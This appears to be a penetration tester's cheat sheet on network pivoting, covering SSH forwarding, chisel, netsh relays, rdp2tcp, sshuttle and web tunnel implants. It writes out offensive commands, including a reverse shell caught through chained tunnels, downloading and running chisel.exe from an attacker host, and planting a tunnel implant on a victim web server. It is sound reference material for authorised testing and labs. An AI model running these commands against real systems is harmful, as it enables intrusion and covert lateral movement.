Pivoting
Check if connections are allowed at a certain port (alternative to nc.exe and powercat.ps1):
nc.ps1
# Test-NetConnection -ComputerName 10.10.13.37 -Port 4444
$port = $args[0]
$endpoint = New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Any, $port)
$listener = New-Object System.Net.Sockets.TcpListener $endpoint
$listener.Start()
Write-Host "Listening on port $port"
while ($true)
{
$client = $listener.AcceptTcpClient()
Write-Host "A client has connected"
$client.Close()
}
Check if the machine can reach specific remote port when Test-NetConnection is not available (1, 2):
$ cme smb 192.168.1.11 -u snovvcrash -p 'Passw0rd!' -x 'powershell (New-Object System.Net.Sockets.TcpClient("192.168.2.22", 445)).Connected' | grep -ai True

SSH

Local vs Remote Port Forwarding

A cheatsheet for SSH Local/Remote Forwarding command syntax:
  • -L 1111:127.0.0.1:2222: the traffic is forwarded from SSH client via SSH server, so 1111 is listening on client-side and traffic is sent to 2222 on server-side.
  • -R 2222:127.0.0.1:1111: the traffic is forwarded from SSH server via SSH client, so 2222 is listening on server-side and traffic is sent to 1111 on client-side.
Consider the following example. An attacker has root privileges on Pivot1. He creates the first SSH tunnel (remote port forwarding) to interact with a vulnerable web server on Pivot2. Then he exploits the vulnerability on Pivot2 and triggers it to connect back to Attacker via a reverse-shell (firewall is active, so he needs to pivot through port 443, which is allowed). After that the attacker performs PE on Pivot2 and gets root. Then he creates another tunnel (local port forwarding) over the first one to SSH into Pivot2 from Attacker. Finally, he forwards port 80 over two existing hops to reach another vulnerable web server on Victim.
Attacker (10.10.13.37) Pivot1 (10.1.1.1) Pivot2 (10.2.2.2) Victim (10.3.3.3)
┌──────────────────────────────────────────────────────────────────────┐ ┌───────────────────────────────────────────────┐ ┌────────────────────────────────┐ ┌───────────────────┐
│ 22 │ │ │ │ │ │ │
│ 1. ssh -R 443:127.0.0.1:9001 [email protected] ------------------------------► 10.1.1.1:22 │ │ │ │ │
│ │ │ │ │ │ │ │
│ 2. │ │ Listens 0.0.0.0:443 ("GatewayPorts yes") │ │ │ │ │
│ │ │ │ │ │ │ │
│ 3. │ │ ~C ssh> -L 9002:10.2.2.2:80 │ │ │ │ │
│ │ │ │ │ │ │ │
│ 4. Listens 127.0.0.1:9002 (to interact with web server 10.2.2.2:80) │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ 5. shellpop -H 10.2.2.2 -P 443 --reverse --number 8 --base64 │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ 9001 over 10.1.1.1:22 │ │ 443 │ │ │ │ │
│ 6. rlwrap nc -lvnp 9001 ◄--- 127.0.0.1:9001 ◄----------------------------- 0.0.0.0:443 ◄───────────────────────────────┼──┼── Web server 10.2.2.2:80 │ │ │
│ │ │ │ │ │ │ │
│ 7. Got shell from 10.2.2.2 │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ 8. Got root on 10.2.2.2 │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ │ │ ~C ssh> -L 9003:127.0.0.1:1337 │ │ │ │ │
│ │ │ │ │ │ │ │
│ 9. Listens 127.0.0.1:9003 │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ │ │ 22 │ │ │ │ │
│ │ │ ssh -L 1337:127.0.0.1:22 [email protected] ----------► 10.2.2.2:22 │ │ │
│ │ │ │ │ │ │ │
│ │ │ Listens 127.0.0.1:1337 │ │ │ │ │
│ │ │ │ │ │ │ │
│ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │
│ 10. ssh [email protected] -p 9003 -------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 │ │ │
│ │ │ │ │ │ │ │
│ │ │ │ │ ~C ssh> -L 9004:10.3.3.3:80 │ │ │
│ │ │ │ │ │ │ │
│ 11. Listens 127.0.0.1:9004 │ │ │ │ │ │ │
│ │ │ │ │ │ │ │
│ 1337 over 10.1.1.1:22 │ │ 22 over 10.2.2.2:22 │ │ │ │ │
│ 12. curl http://127.0.0.1:9004/ ------------------------------------------► 127.0.0.1:1337 ----------------------------------► 127.0.0.1:22 ────────────────┼──┼─► 10.3.3.3:80 │
│ │ │ │ │ │ │ │
└──────────────────────────────────────────────────────────────────────┘ └───────────────────────────────────────────────┘ └────────────────────────────────┘ └───────────────────┘
Notes:
  • 1 For SSH server to listen at 0.0.0.0 instead of 127.0.0.1, the GatewayPorts yes must be set in /etc/ssh/sshd_config.
  • 1 With SSH (or Chisel, for example) server running on the Attacker the same can be achieved by doing local port forwarding instead of remote.
[email protected]:~$ ./chisel server -p 8000
[email protected]:# nohup ./chisel client 10.10.13.37:8000 443:127.0.0.1:9001 &
[email protected]:# netstat -tulpan | grep 443
tcp6 0 0 :::443 :::* LISTEN 18406/./chisel
[email protected]:~$ rlwrap nc -lvnp 9001

Remote Dynamic Forwarding

  • Attacker's IP: 10.10.13.37
  • Victims's IP: 10.10.13.38
An example how to safely set remote dynamic port forwarding (SOCKS) with a builin SSH client.
Generate a dummy SSH key on Victim:
[email protected]:~$ ssh-keygen -f dummy_key -t ed25519 -q -N ""
Add dummy_key.pub contents to authorized_keys on Attacker with the following options:
[email protected]:~$ vi ~/.ssh/authorized_keys
from="10.10.13.38",command="echo 'Only port forwarding is allowed'",no-agent-forwarding,no-X11-forwarding,no-pty <DUMMY_KEY_PUB>
Connect to Attacker's SSH server from Victim:
[email protected]:~$ ssh -fN -R 1080 -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null -i dummy_key [email protected]

netsh

Rules

Allow inbound traffic flow on port 4444/TCP:
Cmd > netsh advfirewall firewall add rule name="Allow 4444" dir=in action=allow protocol=TCP localport=4444
Cmd > netsh advfirewall firewall delete rule name="Allow 4444" protocol=TCP localport=4444

Relay

Add a relay between two machines (need to be local admin).
Make any traffic hitting port 8443 on 0.0.0.0 to be redirected to 10.10.13.37 on port 443:
Cmd > netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8443 connectaddress=10.10.13.37 connectport=443 protocol=tcp
Show active relays:
Cmd > netsh interface portproxy show v4tov4
Remove a relay:
Cmd > netsh interface portproxy delete v4tov4 listenaddress=0.0.0.0 listenport=8443

L2 VPN over SSH

Allow tunneling in SSH server config on Victim:
[email protected]:~$ sudo vi /etc/ssh/sshd_config
...uncomment "PermitTunnel = yes"...
[email protected]:~$ sudo service sshd restart
Connect to Victim building a Ethernet tunnel:
[email protected]:~$ sudo ssh -oTunnel=ethernet -w0:0 [email protected]
Enable tap interfaces on both ends:
[email protected]:~$ sudo ip link set tap0 up
[email protected]:~$ sudo ip link set tap0 up
Put Victim's interface and tap into bridge:
[email protected]:~$ sudo ip link add br0 type bridge
[email protected]:~$ sudo ip link set eth0 master br0
[email protected]:~$ sudo ip link set tap0 master br0
[email protected]:~$ sudo ip link set br0 up
Get an IP address for tap on Attacker:
[email protected]:~$ sudo dhclient -v tap0

SOCKS over Hardened SSH

With AllowTcpForwarding set to no it's also possible to establish a SOCKS connection through active SSH connection:
[email protected]:~$ cat tunnel.sh
ssh [email protected] "./socat TCP-LISTEN:2222,reuseaddr STDIO"
[email protected]:~$ socat TCP:localhost:22 EXEC:./tunnel.sh
[email protected]:~$ ssh -R 1080 -p 2222 [email protected]

TCP over RDP

xfreerdp + rdp2tcp

$ xfreerdp /u:snovvcrash /p:'Passw0rd!' [/d:megacorp.local] /v:PC01.megacorp.local /dynamic-resolution /drive:www,/home/snovvcrash/www +clipboard /rdp2tcp:/home/snovvcrash/tools/rdp-tunnel/rdp2tcp
Reverse local port 9002 (on Victim) to local port 9001 on Attacker (good for reverse shells):
$ python rdp2tcp.py add reverse 127.0.0.1 9001 127.0.0.1 9002
Forward local port 9001 (on Attacker) to local port 9002 on Victim (good for bind shells):
$ python rdp2tcp.py add forward 127.0.0.1 9001 127.0.0.1 9002
Reverse tunnel web access via SOCKS proxy:
$ python rdp2tcp.py add socks5 127.0.0.1 1080
$ python rdp2tcp.py add reverse 127.0.0.1 1080 127.0.0.1 9003
Other xfreerdp tips:
  • Disable NLA with -sec-nla switch if user's password is expired.
  • Use /cert:ignore to always disable certificate prompt.
  • Use /timeout:25000 to increase timeout and avoid "Waiting for activation" error.

Tools

proxychains-ng

Install:
$ git clone https://github.com/rofl0r/proxychains-ng ~/tools/proxychains-ng && cd ~/tools/proxychains-ng
$ ./configure --prefix=/usr --sysconfdir=/etc
$ make
$ sudo make install
$ sudo make install-config
+ edit /etc/proxychains.conf

sshuttle

$ sshuttle -vr [email protected] 192.168.1.0/24 -e "sshpass -p 'Passw0rd!' ssh"
$ sshuttle -vr [email protected] 192.168.1.0/24 -e "ssh -i ./key"

chisel

HTB{ Reddish }
  • Attacker's IP: 10.10.13.37
  • Victims's IP: 10.10.13.38
Reverse local port 1111 (on Victim) to local port 2222 (on Attacker):
$ ./chisel server -p 8000 -v --reverse
PS > (New-Object Net.WebClient).DownloadFile("http://10.10.13.37/chisel.exe", "$env:userprofile\music\chisel.exe")
PS > Get-FileHash -Alg md5 "$env:userprofile\music\chisel.exe"
PS > Start-Process -NoNewWindow -FilePath "$env:userprofile\music\chisel.exe" -ArgumentList "client 10.10.13.37:8000 R:127.0.0.1:2222:127.0.0.1:1111"
Socks5 proxy in server mode:
[email protected]:~$ nohup ./chisel server -p 8000 --socks5 &
[email protected]:~$ ./chisel client 10.10.13.38:8000 [127.0.0.1:1080:]socks
Socks5 proxy in server mode when direct connection to Victim is not available (not relevant as Chisel supports socks5 in client mode now):
[email protected]:~$ ./chisel server -p 8000 --reverse
[email protected]:~$ nohup ./chisel client 10.10.13.37:8000 R:127.0.0.1:8001:127.0.0.1:8002 &
[email protected]:~$ nohup ./chisel server -v -p 8002 --socks5 &
[email protected]:~$ ./chisel client 127.0.0.1:8001 [127.0.0.1:1080:]socks
Socks5 proxy in client mode:
[email protected]:~$ ./chisel server -p 8000 --reverse --socks5 [--auth snovvcrash:'Passw0rd!']
[email protected]:~$ nohup ./chisel client [--fingerprint <BASE64_STRING>] [--auth snovvcrash:'Passw0rd!'] 10.10.13.37:8000 R:[127.0.0.1:1080:]socks &

Double SOCKS Proxy

Double SOCKS Proxy Scheme
[email protected]:~$ ./chisel server -p 8000 --reverse --socks5
[email protected]:~$ nohup ./chisel client 10.10.13.37:8000 R:socks &
[email protected]:~$ nohup ./chisel server -p 8000 --reverse --socks5 &
[email protected]:~$ nohup ./chisel client 192.168.1.11:8000 R:socks &
[email protected]:~$ cp /etc/proxychains4.conf .
[email protected]:~$ echo 'socks5 127.0.0.1 1080' >> proxychains4.conf
[email protected]:~$ echo 'socks5 127.0.0.1 1080' >> proxychains4.conf
[email protected]:~$ proxychains4 -f ./proxychains4.conf nmap -Pn -sT 192.168.3.33 -p445

SharpChisel

revsocks

[email protected]:~$ ./revsocks -listen :8000 -socks 127.0.0.1:1080 -pass 'Passw0rd!'
[email protected]:~$ ./revsocks -connect 10.14.14.3:8000 -pass 'Passw0rd!'

Neo-reGeorg

Generate a tunnel implant and copy it to the Victim web server from ./neoreg_servers/tunnel*:
$ python neoreg.py generate -k 'Passw0rd!'
Connect to the implant (.aspx, for example):
$ python neoreg.py -k 'Passw0rd!' -u http://web01.megacorp.local/tunnel.aspx -l 0.0.0.0 -p 1337 [--skip]